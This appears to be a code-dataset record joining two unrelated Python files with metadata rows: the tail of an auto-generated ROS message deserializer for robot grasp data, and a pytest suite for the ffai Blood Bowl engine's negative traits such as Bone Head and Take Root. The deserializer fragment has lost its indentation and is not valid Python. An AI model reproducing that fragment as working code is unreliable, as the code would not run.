end += length
if python3:
self.action_feedback.feedback.object.object.name = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.properties = []
for i in range(0, length):
val1 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.value = str[start:end]
self.action_feedback.feedback.object.object.properties.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields = []
for i in range(0, length):
val1 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
_x = val1
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields.append(val1)
_x = self
start = end
end += 9
(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step,) = _get_struct_B2I().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_bigendian = bool(self.action_feedback.feedback.object.object.point_cluster.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.action_feedback.feedback.object.object.point_cluster.data = str[start:end]
start = end
end += 1
(self.action_feedback.feedback.object.object.point_cluster.is_dense,) = _get_struct_B().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_dense = bool(self.action_feedback.feedback.object.object.point_cluster.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitives = []
for i in range(0, length):
val1 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val1.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val1.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
self.action_feedback.feedback.object.object.primitives.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v300 = val1.position
_x = _v300
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v301 = val1.orientation
_x = _v301
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.meshes = []
for i in range(0, length):
val1 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.triangles = []
for i in range(0, length):
val2 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val2.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)
val1.triangles.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.vertices = []
for i in range(0, length):
val2 = geometry_msgs.msg.Point()
_x = val2
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val1.vertices.append(val2)
self.action_feedback.feedback.object.object.meshes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v302 = val1.position
_x = _v302
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v303 = val1.orientation
_x = _v303
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses.append(val1)
start = end
end += 32
self.action_feedback.feedback.object.object.surface.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.grasps = []
for i in range(0, length):
val1 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.id = str[start:end]
_v304 = val1.pre_grasp_posture
_v305 = _v304.header
start = end
end += 4
(_v305.seq,) = _get_struct_I().unpack(str[start:end])
_v306 = _v305.stamp
_x = _v306
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v305.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v305.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v304.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v304.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v304.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v307 = val3.time_from_start
_x = _v307
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v304.points.append(val3)
_v308 = val1.grasp_posture
_v309 = _v308.header
start = end
end += 4
(_v309.seq,) = _get_struct_I().unpack(str[start:end])
_v310 = _v309.stamp
_x = _v310
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v309.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v309.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v308.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v308.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v308.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v311 = val3.time_from_start
_x = _v311
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v308.points.append(val3)
_v312 = val1.grasp_pose
_v313 = _v312.header
start = end
end += 4
(_v313.seq,) = _get_struct_I().unpack(str[start:end])
_v314 = _v313.stamp
_x = _v314
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v313.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v313.frame_id = str[start:end]
_v315 = _v312.pose
_v316 = _v315.position
_x = _v316
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v317 = _v315.orientation
_x = _v317
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val1.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v318 = val1.pre_grasp_approach
_v319 = _v318.direction
_v320 = _v319.header
start = end
end += 4
(_v320.seq,) = _get_struct_I().unpack(str[start:end])
_v321 = _v320.stamp
_x = _v321
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v320.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v320.frame_id = str[start:end]
_v322 = _v319.vector
_x = _v322
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v318
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v323 = val1.post_grasp_retreat
_v324 = _v323.direction
_v325 = _v324.header
start = end
end += 4
(_v325.seq,) = _get_struct_I().unpack(str[start:end])
_v326 = _v325.stamp
_x = _v326
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v325.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v325.frame_id = str[start:end]
_v327 = _v324.vector
_x = _v327
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v323
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v328 = val1.post_place_retreat
_v329 = _v328.direction
_v330 = _v329.header
start = end
end += 4
(_v330.seq,) = _get_struct_I().unpack(str[start:end])
_v331 = _v330.stamp
_x = _v331
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v330.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v330.frame_id = str[start:end]
_v332 = _v329.vector
_x = _v332
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v328
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val1.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8', 'rosmsg')
else:
val2 = str[start:end]
val1.allowed_touch_objects.append(val2)
self.action_feedback.feedback.object.grasps.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2I = None
def _get_struct_2I():
global _struct_2I
if _struct_2I is None:
_struct_2I = struct.Struct("<2I")
return _struct_2I
_struct_2f = None
def _get_struct_2f():
global _struct_2f
if _struct_2f is None:
_struct_2f = struct.Struct("<2f")
return _struct_2f
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_3d = None
def _get_struct_3d():
global _struct_3d
if _struct_3d is None:
_struct_3d = struct.Struct("<3d")
return _struct_3d
_struct_4d = None
def _get_struct_4d():
global _struct_4d
if _struct_4d is None:
_struct_4d = struct.Struct("<4d")
return _struct_4d
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
_struct_B2I = None
def _get_struct_B2I():
global _struct_B2I
if _struct_B2I is None:
_struct_B2I = struct.Struct("<B2I")
return _struct_B2I
_struct_B3I = None
def _get_struct_B3I():
global _struct_B3I
if _struct_B3I is None:
_struct_B3I = struct.Struct("<B3I")
return _struct_B3I
_struct_IBI = None
def _get_struct_IBI():
global _struct_IBI
if _struct_IBI is None:
_struct_IBI = struct.Struct("<IBI")
return _struct_IBI
_struct_d = None
def _get_struct_d():
global _struct_d
if _struct_d is None:
_struct_d = struct.Struct("<d")
return _struct_d
_struct_f = None
def _get_struct_f():
global _struct_f
if _struct_f is None:
_struct_f = struct.Struct("<f")
return _struct_f
| 37.485933 | 268 | 0.564829 | 23,233 | 181,207 | 4.145741 | 0.041277 | 0.101829 | 0.075604 | 0.076777 | 0.819265 | 0.805789 | 0.792707 | 0.788887 | 0.763118 | 0.758789 | 0 | 0.040955 | 0.298504 | 181,207 | 4,833 | 269 | 37.493689 | 0.716763 | 0.009409 | 0 | 0.73562 | 1 | 0.000213 | 0.100736 | 0.021702 | 0 | 0 | 0.000056 | 0 | 0 | 1 | 0.004048 | false | 0 | 0.002769 | 0 | 0.011717 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7c84ab05728975d28b7e455afcc9b9038da03c95 | 16,089 | py | Python | tests/game/test_negatraits.py | gsverhoeven/ffai | 673ff00e1aac905381cdfb1228ccfcfccda97d1f | [
"Apache-2.0"
] | 3 | 2019-03-05T16:43:37.000Z | 2020-04-11T14:24:58.000Z | tests/game/test_negatraits.py | gsverhoeven/ffai | 673ff00e1aac905381cdfb1228ccfcfccda97d1f | [
"Apache-2.0"
] | 1 | 2019-02-24T23:04:16.000Z | 2019-02-24T23:04:16.000Z | tests/game/test_negatraits.py | gsverhoeven/ffai | 673ff00e1aac905381cdfb1228ccfcfccda97d1f | [
"Apache-2.0"
] | null | null | null | import pytest
from tests.util import *
@pytest.mark.parametrize("trait", [[Skill.BONE_HEAD, Bonehead], [Skill.REALLY_STUPID, ReallyStupid], [Skill.WILD_ANIMAL, WildAnimal]])
def test_negatrait_pass_allows_player_action(trait):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [trait[0]]
D6.FixedRolls.clear()
D6.fix_result(6) # pass trait test
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has not ended
assert game.state.active_player is player
# check the player state
if trait[0] is Skill.BONE_HEAD:
assert not player.state.bone_headed
elif trait[0] is Skill.REALLY_STUPID:
assert not player.state.really_stupid
# check the player can continue move
to = Square(player.position.x, player.position.y + 1)
game.step(Action(ActionType.MOVE, player=player, position=to))
assert player.position == to
@pytest.mark.parametrize("trait", [[Skill.BONE_HEAD, Bonehead], [Skill.REALLY_STUPID, ReallyStupid], [Skill.WILD_ANIMAL, WildAnimal]])
def test_negatrait_fail_ends_turn(trait):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [trait[0]]
D6.FixedRolls.clear()
D6.fix_result(1) # fail trait test
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has ended
assert game.state.active_player is not player
# check the player state
if trait[0] is Skill.BONE_HEAD:
assert player.state.bone_headed
elif trait[0] is Skill.REALLY_STUPID:
assert player.state.really_stupid
def test_take_root_fail_does_not_end_block_action():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
attacker, defender = get_block_players(game, team)
attacker.extra_skills = [Skill.TAKE_ROOT]
D6.FixedRolls.clear()
D6.fix_result(1) # fail take root test
game.step(Action(ActionType.START_BLOCK, player=attacker))
# check the player turn has not ended
assert game.state.active_player is attacker
def test_take_root_ends_move_turn():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.TAKE_ROOT]
D6.FixedRolls.clear()
D6.fix_result(1) # fail trait test
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has not ended
assert game.state.active_player is not player
def test_take_root_fail_reduces_ma_and_prevents_movement():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.TAKE_ROOT]
D6.FixedRolls.clear()
D6.fix_result(1) # fail trait test
game.step(Action(ActionType.START_MOVE, player=player))
# check the player ma is now 0
assert player.get_ma() == 0
for action in game.get_available_actions():
assert not action.action_type == ActionType.MOVE
# no wild animal test as wild animal has no state impact
@pytest.mark.parametrize("trait", [Skill.BONE_HEAD, Skill.REALLY_STUPID])
def test_negatrait_success_resets_player_state(trait):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [trait]
if trait is Skill.BONE_HEAD:
player.state.bone_headed = True
elif trait is Skill.REALLY_STUPID:
player.state.really_stupid = True
D6.FixedRolls.clear()
D6.fix_result(6) # pass trait test
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has not ended
assert game.state.active_player is player
# check the player state
if trait is Skill.BONE_HEAD:
assert not player.state.bone_headed
elif trait is Skill.REALLY_STUPID:
assert not player.state.really_stupid
@pytest.mark.parametrize("dice_value", [1,2,3])
def test_really_stupid_fails_without_support(dice_value):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.REALLY_STUPID]
game.put(player, Square(5, 5))
adjacent = game.get_adjacent_teammates(player)
assert len(adjacent) == 0
D6.FixedRolls.clear()
D6.fix_result(dice_value) # fail trait test
game.set_available_actions()
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has ended
assert game.state.active_player is not player
# check the player state
assert player.state.really_stupid
@pytest.mark.parametrize("dice_value", [2,3])
def test_really_stupid_passes_with_support(dice_value):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.REALLY_STUPID]
team_mate = players[2]
assert not team_mate.has_skill(Skill.REALLY_STUPID)
game.put(player, Square(5, 5))
game.put(team_mate, Square(5, 6))
adjacent = game.get_adjacent_teammates(player)
assert len(adjacent) == 1
D6.FixedRolls.clear()
D6.fix_result(dice_value) # pass trait test if supported
game.set_available_actions()
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has ended
assert game.state.active_player is player
# check the player state
assert not player.state.really_stupid
@pytest.mark.parametrize("dice_value", [2,3])
def test_really_stupid_fails_if_support_is_really_stupid(dice_value):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.REALLY_STUPID]
team_mate = players[2]
team_mate.extra_skills.append(Skill.REALLY_STUPID)
game.put(player, Square(5, 5))
game.put(team_mate, Square(5,6))
adjacent = game.get_adjacent_teammates(player)
assert len(adjacent) == 1
D6.FixedRolls.clear()
D6.fix_result(dice_value) # fail trait test if supported by really stupid player
game.set_available_actions()
game.step(Action(ActionType.START_MOVE, player=player))
# check the player turn has ended
assert game.state.active_player is not player
# check the player state
assert player.state.really_stupid # check state
@pytest.mark.parametrize("action_type", [ActionType.START_MOVE, ActionType.START_FOUL, ActionType.START_HANDOFF, ActionType.START_PASS])
def test_wild_animal_fails_without_block_or_blitz(action_type):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.WILD_ANIMAL]
D6.FixedRolls.clear()
D6.fix_result(2) # fails without block/blitz
game.step(Action(action_type, player=player))
# check the player turn has ended
assert game.state.active_player is not player
assert game.has_report_of_type(OutcomeType.FAILED_WILD_ANIMAL)
@pytest.mark.parametrize("action_type", [ActionType.START_BLITZ, ActionType.START_BLOCK])
def test_wild_animal_passes_when_block_or_blitz(action_type):
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
attacker, defender = get_block_players(game, team) # need adjacent players here.
attacker.extra_skills = [Skill.WILD_ANIMAL]
D6.FixedRolls.clear()
D6.fix_result(2) # fails without block/blitz
game.step(Action(action_type, player=attacker))
# check the player turn has ended
assert not game.has_report_of_type(OutcomeType.FAILED_WILD_ANIMAL)
assert game.has_report_of_type(OutcomeType.SUCCESSFUL_WILD_ANIMAL)
def test_take_root_doesnt_trigger_if_rooted():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.TAKE_ROOT]
player.state.taken_root = True
D6.FixedRolls.clear()
D6.fix_result(2) # pass take root if it happens
game.step(Action(ActionType.START_MOVE, player=player))
assert not game.has_report_of_type(OutcomeType.SUCCESSFUL_TAKE_ROOT)
def test_rooted_players_cannot_start_a_move_or_blitz():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
player, defender = get_block_players(game, team) # need adjacent players here.
player.extra_skills = [Skill.TAKE_ROOT]
player.state.taken_root = True
# need to end turn here as available actions were set before taken_root happened.
game.step(Action(ActionType.END_TURN))
game.step(Action(ActionType.END_TURN))
actions = game.get_available_actions()
for action in actions:
if action.action_type is ActionType.START_MOVE:
assert player not in action.players
if action.action_type is ActionType.START_BLITZ:
assert player not in action.players
if action.action_type is ActionType.START_BLOCK:
assert player in action.players
if action.action_type is ActionType.START_PASS:
if game.get_ball_carrier() == player:
assert player in action.players
if action.action_type is ActionType.START_HANDOFF:
if game.get_ball_carrier() == player:
assert player in action.players
if action.action_type is ActionType.START_FOUL:
if len(game.get_adjacent_opponents(player, down=True, standing=False)) > 0:
assert player in action.players
def test_take_root_not_removed_on_end_turn():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.TAKE_ROOT]
player.state.taken_root = True
game.step(Action(ActionType.END_TURN))
assert player.state.taken_root
def test_take_root_removed_on_touchdown():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.TAKE_ROOT]
player.state.taken_root = True
scoring_player = players[2]
game.move(scoring_player, Square(2, 5))
game.get_ball().move_to(scoring_player.position)
game.get_ball().is_carried = True
assert not game.arena.is_in_opp_endzone(scoring_player.position, scoring_player.team == game.state.home_team)
to = Square(1, 5)
game.set_available_actions()
game.step(Action(ActionType.START_MOVE, player=scoring_player))
game.step(Action(ActionType.MOVE, player=scoring_player, position=to))
assert game.has_report_of_type(OutcomeType.TOUCHDOWN)
assert not player.state.taken_root
def test_take_root_removed_on_new_half():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
players = game.get_players_on_pitch(team)
player = players[1]
player.extra_skills = [Skill.TAKE_ROOT]
player.state.taken_root = True
i = 0
while game.state.half == 1 and i < 18:
game.step(Action(ActionType.END_TURN))
i += 1
assert game.has_report_of_type(OutcomeType.END_OF_FIRST_HALF)
assert not player.state.taken_root
def test_take_root_removed_on_knockdown():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0 # ensure no reroll prompt
attacker, defender = get_block_players(game, team)
defender.extra_skills = [Skill.TAKE_ROOT]
defender.state.taken_root = True
assert not defender.has_skill(Skill.BLOCK)
attacker.extra_skills = [Skill.BLOCK]
BBDie.clear_fixes()
BBDie.fix_result(BBDieResult.BOTH_DOWN)
game.step(Action(ActionType.START_BLOCK, player=attacker))
game.step(Action(ActionType.BLOCK, position=defender.position))
game.step(Action(ActionType.SELECT_BOTH_DOWN))
assert not defender.state.up
assert game.has_report_of_type(OutcomeType.KNOCKED_DOWN)
assert not defender.state.taken_root
def test_taken_root_players_may_not_follow_up():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0
attacker, defender = get_block_players(game, team)
attacker.extra_skills = [Skill.TAKE_ROOT]
attacker.state.taken_root = True
attacker.extra_st = defender.get_st() - attacker.get_st() + 1 # make this a 2 die block.
# it's a 2 dice block
BBDie.clear_fixes()
BBDie.fix_result(BBDieResult.DEFENDER_DOWN)
game.step(Action(ActionType.START_BLOCK, player=attacker))
game.step(Action(ActionType.BLOCK, position=defender.position))
game.step(Action(ActionType.SELECT_DEFENDER_DOWN))
game.step(Action(ActionType.PUSH, position=game.get_available_actions()[0].positions[0]))
for action in game.get_available_actions():
assert action.action_type is not ActionType.FOLLOW_UP
def test_taken_root_players_may_not_follow_up_push():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0
attacker, defender = get_block_players(game, team)
attacker.extra_skills = [Skill.TAKE_ROOT]
attacker.state.taken_root = True
attacker.extra_st = defender.get_st() - attacker.get_st() + 1 # make this a 2 die block.
# it's a 2 dice block
BBDie.clear_fixes()
BBDie.fix_result(BBDieResult.PUSH)
game.step(Action(ActionType.START_BLOCK, player=attacker))
game.step(Action(ActionType.BLOCK, position=defender.position))
game.step(Action(ActionType.SELECT_PUSH))
game.step(Action(ActionType.PUSH, position=game.get_available_actions()[0].positions[0]))
for action in game.get_available_actions():
assert action.action_type is not ActionType.FOLLOW_UP
def test_taken_root_players_may_not_be_pushed():
game = get_game_turn()
team = game.get_agent_team(game.actor)
team.state.rerolls = 0
attacker, defender = get_block_players(game, team)
defender.extra_skills = [Skill.TAKE_ROOT]
defender.state.taken_root = True
attacker.extra_st = defender.get_st() - attacker.get_st() + 1 # make this a 2 die block.
def_pos = defender.position
# it's a 2 dice block
BBDie.clear_fixes()
BBDie.fix_result(BBDieResult.PUSH)
BBDie.fix_result(BBDieResult.PUSH)
game.step(Action(ActionType.START_BLOCK, player=attacker))
game.step(Action(ActionType.BLOCK, position=defender.position))
game.step(Action(ActionType.SELECT_PUSH))
for action in game.get_available_actions():
assert action.action_type is not ActionType.PUSH
# game.step(Action(ActionType.PUSH, position=game.get_available_actions()[0].positions[0]))
for action in game.get_available_actions():
assert action.action_type is not ActionType.FOLLOW_UP
assert defender.position is def_pos
| 33.588727 | 136 | 0.72217 | 2,308 | 16,089 | 4.798094 | 0.077556 | 0.044248 | 0.042984 | 0.069352 | 0.856601 | 0.842243 | 0.818223 | 0.778942 | 0.762146 | 0.738396 | 0 | 0.009367 | 0.183852 | 16,089 | 478 | 137 | 33.658996 | 0.833981 | 0.102679 | 0 | 0.743034 | 0 | 0 | 0.004661 | 0 | 0 | 0 | 0 | 0 | 0.154799 | 1 | 0.06192 | false | 0.01548 | 0.006192 | 0 | 0.068111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
